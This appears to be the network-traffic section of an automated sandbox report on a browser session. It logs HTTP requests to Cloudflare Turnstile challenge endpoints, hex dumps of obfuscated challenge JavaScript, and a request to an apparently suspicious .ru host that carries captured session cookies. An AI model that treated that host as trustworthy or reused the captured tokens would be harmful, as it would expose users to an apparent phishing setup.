                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 3a 42 5b 67 4d 28 31 36 36 33 29 5d 28 6d 2c 45 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 42 5b 67 4d 28 37 36 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 6f 3d 65 4d 5b 67 4d 28 31 35 39 38 29 5d 5b 67 4d 28 31 30 34 32 29 5d 3f 69 5b 67 4d 28 35 33 38 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 4d 28 31 35 39 38 29 5d 5b 67 4d 28 31 30 34 32 29 5d 29 2b 27 2f 27 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 66 5b 67 4d 28 31 32 32 36 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 66 5b 67 4d 28 31 32 32 36 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 35 30 33 29 5d 28 66 5b 67 4d 28 31 32 32 36 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 38 39 39 29 5d 28 66 5b 67
                                                                                                                                                                                                                                                          Data Ascii: :B[gM(1663)](m,E,!![]);continue;case'6':B[gM(767)]=function(){};continue;case'7':o=eM[gM(1598)][gM(1042)]?i[gM(538)]('h/',eM[gM(1598)][gM(1042)])+'/':'';continue;case'8':f[gM(1226)]instanceof Error?f[gM(1226)]=JSON[gM(503)](f[gM(1226)],Object[gM(899)](f[g
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 29 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 67 4e 28 31 31 39 30 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 67 4e 28 31 31 31 38 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 70 61 72 73 65 49 6e 74 28 6c 5b 33 5d 2c 31 30 29 29 29 3a 67 3d 68 5b 67 4e 28 31 34 35 34 29 5d 28 69 2c 6a 5b 67 4e 28 31 35 39 38 29 5d 5b 67 4e 28 34 30 30 29 5d 29 29 3a 66 3d 4a 53 4f 4e 5b 67 4e 28 35 30 33 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 4e 28 31 34 39 32 29 5d 3d 66 2c 6d 5b 67 4e 28 31 31 30 33 29 5d 3d 67 2c 6d 5b 67 4e 28 31 31 36 36 29 5d 3d 68 2c 6d 5b 67 4e 28 39 33 30 29 5d 3d 69 2c 6d 5b 67 4e 28 31 32 32 36 29
                                                                                                                                                                                                                                                          Data Ascii: ))&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][gN(1190)](k),l&&(g=l[1],h=e[gN(1118)](parseInt,l[2],10),i=parseInt(l[3],10))):g=h[gN(1454)](i,j[gN(1598)][gN(400)])):f=JSON[gN(503)](d);return m={},m[gN(1492)]=f,m[gN(1103)]=g,m[gN(1166)]=h,m[gN(930)]=i,m[gN(1226)
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 28 35 31 34 29 5d 28 73 65 74 49 6e 74 65 72 76 61 6c 2c 66 75 6e 63 74 69 6f 6e 28 68 46 29 7b 68 46 3d 68 45 2c 64 5b 68 46 28 31 34 31 33 29 5d 28 66 52 29 7d 2c 31 65 33 29 3a 65 26 26 64 5b 68 45 28 31 32 38 37 29 5d 28 65 5b 68 45 28 31 32 37 30 29 5d 2c 68 45 28 31 31 32 38 29 29 26 26 65 5b 68 45 28 31 33 34 38 29 5d 3d 3d 3d 68 45 28 31 33 37 31 29 26 26 64 5b 68 45 28 33 39 31 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 72 29 7d 29 2c 66 74 3d 21 5b 5d 2c 21 65 55 28 67 4a 28 31 30 32 32 29 29 26 26 28 66 52 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 64 2c 63 2c 64 2c 65 2c 67 2c 68 2c 69 29 7b 28 69 64 3d 67 4a 2c 63 3d 7b 27 73 41 77 4f 54 27 3a 69 64 28 31 34 37 30 29 2c 27 46 6d 51 6e 71 27 3a 66 75
                                                                                                                                                                                                                                                          Data Ascii: (514)](setInterval,function(hF){hF=hE,d[hF(1413)](fR)},1e3):e&&d[hE(1287)](e[hE(1270)],hE(1128))&&e[hE(1348)]===hE(1371)&&d[hE(391)](clearInterval,fr)}),ft=![],!eU(gJ(1022))&&(fR(),setInterval(function(id,c,d,e,g,h,i){(id=gJ,c={'sAwOT':id(1470),'FmQnq':fu
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 72 65 74 75 72 6e 20 49 2b 4a 7d 2c 73 5b 69 6a 28 36 37 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 4a 29 7b 72 65 74 75 72 6e 20 49 2b 4a 7d 2c 78 3d 73 2c 78 5b 69 6a 28 31 31 30 34 29 5d 28 6e 75 6c 6c 2c 69 29 7c 7c 78 5b 69 6a 28 31 35 35 39 29 5d 28 76 6f 69 64 20 30 2c 69 29 29 72 65 74 75 72 6e 20 6f 3b 66 6f 72 28 43 3d 66 58 28 69 29 2c 68 5b 69 6a 28 37 39 37 29 5d 5b 69 6a 28 38 39 39 29 5d 26 26 28 43 3d 43 5b 69 6a 28 38 35 36 29 5d 28 68 5b 69 6a 28 37 39 37 29 5d 5b 69 6a 28 38 39 39 29 5d 28 69 29 29 29 2c 43 3d 68 5b 69 6a 28 31 33 37 35 29 5d 5b 69 6a 28 31 35 37 34 29 5d 26 26 68 5b 69 6a 28 36 37 30 29 5d 3f 68 5b 69 6a 28 31 33 37 35 29 5d 5b 69 6a 28 31 35 37 34 29 5d 28 6e 65 77 20 68 5b 28 69 6a 28 36 37 30 29 29 5d 28 43 29 29
                                                                                                                                                                                                                                                          Data Ascii: return I+J},s[ij(676)]=function(I,J){return I+J},x=s,x[ij(1104)](null,i)||x[ij(1559)](void 0,i))return o;for(C=fX(i),h[ij(797)][ij(899)]&&(C=C[ij(856)](h[ij(797)][ij(899)](i))),C=h[ij(1375)][ij(1574)]&&h[ij(670)]?h[ij(1375)][ij(1574)](new h[(ij(670))](C))
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6b 5b 69 6d 28 31 33 31 31 29 5d 28 6f 2c 69 5b 6c 5b 6d 5d 5d 5b 69 6d 28 36 38 36 29 5d 29 3b 2d 31 3d 3d 3d 68 5b 6e 5d 5b 69 6d 28 31 35 38 36 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 26 26 28 66 5a 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 69 6d 28 31 31 32 35 29 5d 28 27 6f 2e 27 2b 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 69 6d 28 38 35 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 76 2c 69 6f 29 7b 72 65 74 75 72 6e 20 69 6f 3d 69 6d 2c 6b 5b 69 6f 28 35 31 36 29 5d 28 27 6f 2e 27 2c 76 29 7d 29 7d 2c 65 4d 5b 67 4a 28 35 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 69 43 2c 65 29 7b 65 3d 28 69 43 3d 67 4a 2c 7b 27 68 49 52 55 4c
                                                                                                                                                                                                                                                          Data Ascii: n]){for(o=0;k[im(1311)](o,i[l[m]][im(686)]);-1===h[n][im(1586)](i[l[m]][o])&&(fZ(i[l[m]][o])||h[n][im(1125)]('o.'+i[l[m]][o])),o++);}else h[n]=i[l[m]][im(855)](function(v,io){return io=im,k[io(516)]('o.',v)})},eM[gJ(585)]=function(c,iC,e){e=(iC=gJ,{'hIRUL
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 75 72 6e 20 68 3c 69 7d 2c 27 41 43 6f 42 4a 27 3a 6a 52 28 36 36 32 29 2c 27 51 4c 51 56 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 64 52 44 45 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4e 58 42 63 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 68 6b 73 64 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4d 6a 49 41 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 41 57 4e 69 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 58 4b 76 45 56 27 3a 6a 52 28 37 34 35 29 2c 27 74 73 73 68
                                                                                                                                                                                                                                                          Data Ascii: urn h<i},'ACoBJ':jR(662),'QLQVp':function(h,i){return h(i)},'dRDEj':function(h,i){return h<<i},'NXBcF':function(h,i){return i|h},'hksdg':function(h,i){return h(i)},'MjIAl':function(h,i){return i==h},'AWNiQ':function(h,i){return h(i)},'XKvEV':jR(745),'tssh
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1369INData Raw: 2c 27 73 43 63 67 67 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3e 3e 3e 50 7d 2c 27 5a 6c 41 4a 47 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 51 29 7b 72 65 74 75 72 6e 20 4f 28 50 2c 51 29 7d 2c 27 76 71 4b 4d 78 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 51 29 7b 72 65 74 75 72 6e 20 4f 28 50 2c 51 29 7d 2c 27 57 67 48 79 69 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 26 50 7d 2c 27 54 4f 59 74 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 51 2c 6a 57 29 7b 72 65 74 75 72 6e 20 6a 57 3d 62 2c 64 5b 6a 57 28 31 31 37 34 29 5d 28 4f 2c 50 2c 51 29 7d 7d 2c 64 5b 6a 58 28 31 34 35 32 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27
                                                                                                                                                                                                                                                          Data Ascii: ,'sCcgg':function(O,P){return O>>>P},'ZlAJG':function(O,P,Q){return O(P,Q)},'vqKMx':function(O,P,Q){return O(P,Q)},'WgHyi':function(O,P){return O&P},'TOYtn':function(O,P,Q,jW){return jW=b,d[jW(1174)](O,P,Q)}},d[jX(1452)](null,i))return'';for(B={},C={},D='


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          10192.168.2.549732104.18.95.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:55 GMT
                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f53739b8ed0c35d-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          11192.168.2.549717104.21.80.14433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:55 UTC1351OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                          Host: gadk.quantumdhub.ru
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6InZpRlNVMjlYSm9ZcXFqbWpXVGtFWlE9PSIsInZhbHVlIjoieXoxNG9xYWtqcGRDUkZOMXFtT1hZZTFRZjNXM0RxU3Y2WUIxUHpCV0NKTThnQ09ML3hqcjRnRXd2QndiU1Y3K0xvQjlXVlFsZFcxckE4bnMvQnVMTHhOVXl3aWgzV1VicjgrQzhIWG9lNUEzTVRUajlJOXYyNHlhblhKM1drTUwiLCJtYWMiOiJjNDE2Mzk2NmI4MTJmZjNlMzY0MTkyYWIzZWExNTBlOTZiYTlmMDkzNjcxODkzNWEwNDM3MTE2ZWQyNWEzMWU0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFJS2xRSlN4VVZLdXRCc0pOYk5VZnc9PSIsInZhbHVlIjoiazlhQkxNV3F6OVdHWDZ6ZE9LOTVWcnZORmxTOVBqQ0kxeXkzdm5xZ0VmeXhCNlZDMU5rMC9zUmFsY1cwNXVMUlFzK3kyNTJQZGNGNFIvK3hEbXdCbnV0MTVFV0JsakZSTTN0d1JXbmtmTDBub1RPc3F6OW10b0w3c2tpcU5QcnciLCJtYWMiOiI2NjAxNzk2NGU1MmQzYjc1YjVjYTQ4MGVhMTczZWNhZGIxYjBjZDQwYWIyNzY5MjUyNzQ5M2MwZDNiNDE3NzY5IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                          2024-12-20 23:35:56 UTC1059INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Zs16ks2siptKF0TTTImZcm1g8hmLIveGGK5ITF%2FStCvWAItQyCIHNRek7Du8k5yIEIQ8yqHdqLRiNw7ijlbbW6s48H58bHYSbVtsLqb8dlqa%2FQgnM7j7qPyOl4tAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1230&min_rtt=1208&rtt_var=360&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2265&delivery_rate=2283911&cwnd=251&unsent_bytes=0&cid=3f35405dad639a9f&ts=125&x=0"
                                                                                                                                                                                                                                                          CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f53739fcfb27d0e-EWR
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1950&rtt_var=739&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1929&delivery_rate=1497435&cwnd=243&unsent_bytes=0&cid=57a8c6845244f4ca&ts=9959&x=0"
                                                                                                                                                                                                                                                          2024-12-20 23:35:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          12192.168.2.549739104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:56 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:57 GMT
                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373a618c0728f-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          13192.168.2.549740104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f53738f5cfa15bb&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:57 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 117623
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373a7db8b42d3-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                                                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53
                                                                                                                                                                                                                                                          Data Ascii: llenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_description":"S
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 33 2c 66 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 34 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 33 31 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 38 37 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 38 36 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 34 39 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 38 35 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 30 39 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e
                                                                                                                                                                                                                                                          Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,f3,f4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1324))/1*(parseInt(gI(1731))/2)+-parseInt(gI(787))/3*(-parseInt(gI(1486))/4)+-parseInt(gI(1649))/5*(parseInt(gI(785))/6)+parseInt(gI(1609))/7*(-parseIn
                                                                                                                                                                                                                                                          2024-12-20 23:35:57 UTC1369INData Raw: 47 63 5a 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4a 77 7a 71 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6c 59 65 66 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 6e 45 5a 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 59 74 76 46 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 77 6c 56 6f 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 57 68 6b 68 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 55 41 76 4d 5a 27 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                          Data Ascii: GcZR':function(h,i){return i==h},'Jwzqu':function(h,i){return h*i},'lYefs':function(h,i){return h(i)},'SnEZb':function(h,i){return h>i},'YtvFI':function(h,i){return h*i},'wlVoM':function(h,i){return i==h},'WhkhT':function(h,i){return h(i)},'UAvMZ':functio
